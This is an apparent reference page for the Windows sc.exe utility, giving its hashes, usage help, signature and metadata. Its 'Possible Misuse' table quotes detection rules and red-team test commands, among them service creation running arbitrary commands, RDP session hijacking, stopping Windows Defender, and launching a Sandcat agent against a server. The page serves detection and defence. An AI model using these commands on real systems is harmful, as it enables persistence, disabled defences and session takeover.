
  • File Path: C:\WINDOWS\system32\sc.exe
  • Description: Service Control Manager Configuration Tool


Type Hash
MD5 7654E408563F6A4150171DD3877F8EC7
SHA1 7D4736B3906E6B991F1070B0718063F134E7DAE3
SHA256 8A5410D1A08FCC5CF03B9CE98E62E0049E8E8295CD35B845EEBDC882CA657BC1
SHA384 7DE7DCCA169A9EEF98E86389C3652D7E63F652C381223955FEAC0892AB56F420B0F7A9694C85729059051F0AA669F9EF
SHA512 6FE0479D5F7CA02DEC15D4D69CA2F8EFFAA3CD431723D403CB033F564DA45E9A44C8169074785DEDEC12F413A67C827FDC1CD50204B4756065B99503F7B0A3EC
SSDEEP 1536:PGnHP0wx1Wv6s+DubW9bTN9FJ7Hh9hNRKJzyj:PmH5u6rB9fNTJ7Hh9hNRKRs
IMP 803254E010814E69947095A2725B2AFD
PESHA1 90A8F9184FAA3940B05BEAD7EB2CCE4291360AE8
PE256 B03C6E956F94E22283DF864675BF7139E852FB59A06CD93B8A8C68455D9860B3

Runtime Data

Usage (stdout):

ERROR:  Unrecognized command

        SC is a command line program used for communicating with the
        Service Control Manager and services.
        sc <server> [command] [service name] <option1> <option2>...

        The option <server> has the form "\\ServerName"
        Further help on commands can be obtained by typing: "sc [command]"
          query-----------Queries the status for a service, or
                          enumerates the status for types of services.
          queryex---------Queries the extended status for a service, or
                          enumerates the status for types of services.
          start-----------Starts a service.
          pause-----------Sends a PAUSE control request to a service.
          interrogate-----Sends an INTERROGATE control request to a service.
          continue--------Sends a CONTINUE control request to a service.
          stop------------Sends a STOP request to a service.
          config----------Changes the configuration of a service (persistent).
          description-----Changes the description of a service.
          failure---------Changes the actions taken by a service upon failure.
          failureflag-----Changes the failure actions flag of a service.
          sidtype---------Changes the service SID type of a service.
          privs-----------Changes the required privileges of a service.
          managedaccount--Changes the service to mark the service account 
                          password as managed by LSA.
          qc--------------Queries the configuration information for a service.
          qdescription----Queries the description for a service.
          qfailure--------Queries the actions taken by a service upon failure.
          qfailureflag----Queries the failure actions flag of a service.
          qsidtype--------Queries the service SID type of a service.
          qprivs----------Queries the required privileges of a service.
          qtriggerinfo----Queries the trigger parameters of a service.
          qpreferrednode--Queries the preferred NUMA node of a service.
          qmanagedaccount-Queries whether a services uses an account with a 
                          password managed by LSA.
          qprotection-----Queries the process protection level of a service.
          quserservice----Queries for a local instance of a user service template.
          delete----------Deletes a service (from the registry).
          create----------Creates a service. (adds it to the registry).
          control---------Sends a control to a service.
          sdshow----------Displays a service's security descriptor.
          sdset-----------Sets a service's security descriptor.
          showsid---------Displays the service SID string corresponding to an arbitrary name.
          triggerinfo-----Configures the trigger parameters of a service.
          preferrednode---Sets the preferred NUMA node of a service.
          GetDisplayName--Gets the DisplayName for a service.
          GetKeyName------Gets the ServiceKeyName for a service.
          EnumDepend------Enumerates Service Dependencies.

        The following commands don't require a service name:
        sc <server> <command> <option>
          boot------------(ok | bad) Indicates whether the last boot should
                          be saved as the last-known-good boot configuration
          Lock------------Locks the Service Database
          QueryLock-------Queries the LockStatus for the SCManager Database
        sc start MyService

        If the query command is followed by a service name, the status
        for that service is returned.  Further options do not apply in
        this case.  If the query command is followed by nothing or one of
        the options listed below, the services are enumerated.
    type=    Type of services to enumerate (driver, service, userservice, all)
             (default = service)
    state=   State of services to enumerate (inactive, all)
             (default = active)
    bufsize= The size (in bytes) of the enumeration buffer
             (default = 4096)
    ri=      The resume index number at which to begin the enumeration
             (default = 0)
    group=   Service group to enumerate
             (default = all groups)

sc query                - Enumerates status for active services & drivers
sc query eventlog       - Displays status for the eventlog service
sc queryex eventlog     - Displays extended status for the eventlog service
sc query type= driver   - Enumerates only active drivers
sc query type= service  - Enumerates only Win32 services
sc query state= all     - Enumerates all services & drivers
sc query bufsize= 50    - Enumerates with a 50 byte buffer
sc query ri= 14         - Enumerates with resume index = 14
sc queryex group= ""    - Enumerates active services not in a group
sc query type= interact - Enumerates all interactive services
sc query type= driver group= NDIS     - Enumerates all NDIS drivers

Loaded Modules:



  • Status: Signature verified.
  • Serial: 33000002ED2C45E4C145CF48440000000002ED
  • Thumbprint: 312860D2047EB81F8F58C29FF19ECDB4C634CF6A
  • Issuer: CN=Microsoft Windows Production PCA 2011, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
  • Subject: CN=Microsoft Windows, O=Microsoft Corporation, L=Redmond, S=Washington, C=US

File Metadata

  • Original Filename: sc.exe.mui
  • Product Name: Microsoft Windows Operating System
  • Company Name: Microsoft Corporation
  • File Version: 10.0.22000.1 (WinBuild.160101.0800)
  • Product Version: 10.0.22000.1
  • Language: English (United States)
  • Legal Copyright: Microsoft Corporation. All rights reserved.
  • Machine Type: 64-bit

File Scan

  • VirusTotal Detections: 0/71
  • VirusTotal Link:

Possible Misuse

The following table contains possible examples of sc.exe being misused. While sc.exe is not inherently malicious, its legitimate functionality can be abused for malicious purposes.

Source Source File Example License
sigma image_load_suspicious_dbghelp_dbgcore_load.yml - '\sc.exe' DRL 1.0
sigma proc_creation_win_multiple_suspicious_cli.yml - sc.exe DRL 1.0
sigma proc_creation_win_new_service_creation.yml - Image\|endswith: '\sc.exe' DRL 1.0
sigma proc_creation_win_service_stop.yml - '\sc.exe' DRL 1.0
sigma proc_creation_win_susp_recon.yml - '\sc.exe' DRL 1.0
sigma proc_creation_win_susp_service_dacl_modification.yml - '\sc.exe' DRL 1.0
sigma proc_creation_win_susp_service_path_modification.yml Image\|endswith: '\sc.exe' DRL 1.0
sigma proc_creation_win_susp_spoolsv_child_processes.yml - \sc.exe DRL 1.0
sigma proc_creation_win_using_sc_to_change_sevice_image_path_by_non_admin.yml description: Detection of sc.exe utility spawning by user with Medium integrity level to change service ImagePath or FailureCommand DRL 1.0
sigma proc_creation_win_using_sc_to_change_sevice_image_path_by_non_admin.yml Image\|endswith: '\sc.exe' DRL 1.0
sigma proc_creation_win_using_sc_to_hide_sevices.yml description: Detection of sc.exe utility adding a new service with special permission which hides that service. DRL 1.0
sigma proc_creation_win_using_sc_to_hide_sevices.yml Image\|endswith: '\sc.exe' DRL 1.0
LOLBAS Sc.yml Name: Sc.exe  
LOLBAS Sc.yml - Path: C:\Windows\System32\sc.exe  
LOLBAS Sc.yml - Path: C:\Windows\SysWOW64\sc.exe  
malware-ioc misp-badiis.json "description": "Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager (<code>services.exe</code>) is an interface to manage and manipulate services.(Citation: Microsoft Service Control Manager) The service control manager is accessible to users via GUI components as well as system utilities such as <code>sc.exe</code> and [Net](\n\n[PsExec]( can also be used to execute commands or payloads via a temporary Windows service created through the service control manager API.(Citation: Russinovich Sysinternals)\n\nAdversaries may leverage these mechanisms to execute malicious content. This can be done by either executing a new or modified service. This technique is the execution used in conjunction with [Windows Service]( during service persistence or privilege escalation.", © ESET 2014-2018
atomic-red-team Stops a specified service using the sc.exe command. Upon execution, if the spooler service was running infomration will be displayed saying MIT License. © 2018 Red Canary
atomic-red-team sc.exe stop #{service_name} MIT License. © 2018 Red Canary
atomic-red-team sc.exe start #{service_name} >nul 2>&1 MIT License. © 2018 Red Canary
atomic-red-team <blockquote>Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.(Citation: TechNet Services) Windows service configuration information, including the file path to the service’s executable or recovery programs/commands, is stored in the Windows Registry. Service configurations can be modified using utilities such as sc.exe and Reg. MIT License. © 2018 Red Canary
atomic-red-team Upon successful execution, powershell will download AtomicService.exe from github. cmd.exe will spawn sc.exe which will create and start the service. Results will output via stdout. MIT License. © 2018 Red Canary
atomic-red-team sc.exe create #{service_name} binPath= #{binary_path} MIT License. © 2018 Red Canary
atomic-red-team sc.exe start #{service_name} MIT License. © 2018 Red Canary
atomic-red-team sc.exe stop #{service_name} >nul 2>&1 MIT License. © 2018 Red Canary
atomic-red-team sc.exe delete #{service_name} >nul 2>&1 MIT License. © 2018 Red Canary
atomic-red-team sc.exe delete W64Time MIT License. © 2018 Red Canary
atomic-red-team if(sc.exe query sysmon | findstr sysmon) { exit 0 } else { exit 1 } MIT License. © 2018 Red Canary
atomic-red-team sc.exe config #{service_name} start= disabled MIT License. © 2018 Red Canary
atomic-red-team sc.exe config #{service_name} start= auto >nul 2>&1 MIT License. © 2018 Red Canary
atomic-red-team sc.exe create sesshijack binpath= “cmd.exe /k tscon #{Session_ID} /dest:#{Destination_ID}” MIT License. © 2018 Red Canary
atomic-red-team sc.exe delete sesshijack >nul 2>&1 MIT License. © 2018 Red Canary
atomic-red-team <blockquote>Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager (services.exe) is an interface to manage and manipulate services.(Citation: Microsoft Service Control Manager) The service control manager is accessible to users via GUI components as well as system utilities such as sc.exe and Net. MIT License. © 2018 Red Canary
atomic-red-team Upon successful execution, cmd.exe creates a new service using sc.exe that will start powershell.exe to create a new file art-marker.txt MIT License. © 2018 Red Canary
atomic-red-team sc.exe create #{service_name} binPath= “#{executable_command}” MIT License. © 2018 Red Canary
atomic-red-team sc.exe start #{service_name} MIT License. © 2018 Red Canary
atomic-red-team sc.exe delete #{service_name} MIT License. © 2018 Red Canary
atomic-red-team <blockquote>Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services. Adversaries may use flaws in the permissions for registry to redirect from the originally specified executable to one that they control, in order to launch their own code at Service start. Windows stores local service configuration information in the Registry under HKLM\SYSTEM\CurrentControlSet\Services. The information stored under a service’s Registry keys can be manipulated to modify a service’s execution parameters through tools such as the service controller, sc.exe, PowerShell, or Reg. Access to Registry keys is controlled through Access Control Lists and permissions. (Citation: Registry Key Security) MIT License. © 2018 Red Canary
atomic-red-team sc.exe delete #{weak_service_name} MIT License. © 2018 Red Canary
atomic-red-team sc.exe create #{weak_service_name} binpath= “#{weak_service_path}” MIT License. © 2018 Red Canary
atomic-red-team #{local_folder}#{local_executable} /EXEFilename “C:\Windows\System32\sc.exe” /WindowState 0 /CommandLine “stop WinDefend” /StartDirectory “” /RunAs 8 /Run MIT License. © 2018 Red Canary
signature-base crime_ransom_robinhood.yar $s4 = “sc.exe stop SQLAgent$SQLEXPRESS” nocase CC BY-NC 4.0
signature-base gen_empire.yar $s1 = “$Result = sc.exe config $($TargetService.Name) binPath= $OriginalPath” fullword ascii CC BY-NC 4.0
signature-base gen_empire.yar $s2 = “$Result = sc.exe pause $($TargetService.Name)” fullword ascii CC BY-NC 4.0
stockpile 95727b87-175c-4a69-8c7a-a5d82746a753.yml sc.exe \\#{} stop sandsvc; Apache-2.0
stockpile 95727b87-175c-4a69-8c7a-a5d82746a753.yml sc.exe \\#{} delete sandsvc /f; Apache-2.0
stockpile 95727b87-175c-4a69-8c7a-a5d82746a753.yml sc.exe \\#{} create sandsvc start= demand error= ignore binpath= "cmd /c start C:\Users\Public\s4ndc4t.exe -server #{server} -v -originLinkID #{origin_link_id}" displayname= "Sandcat Execution"; Apache-2.0
stockpile 95727b87-175c-4a69-8c7a-a5d82746a753.yml sc.exe \\#{} start sandsvc; Apache-2.0

MIT License. Copyright (c) 2020-2021 Strontic.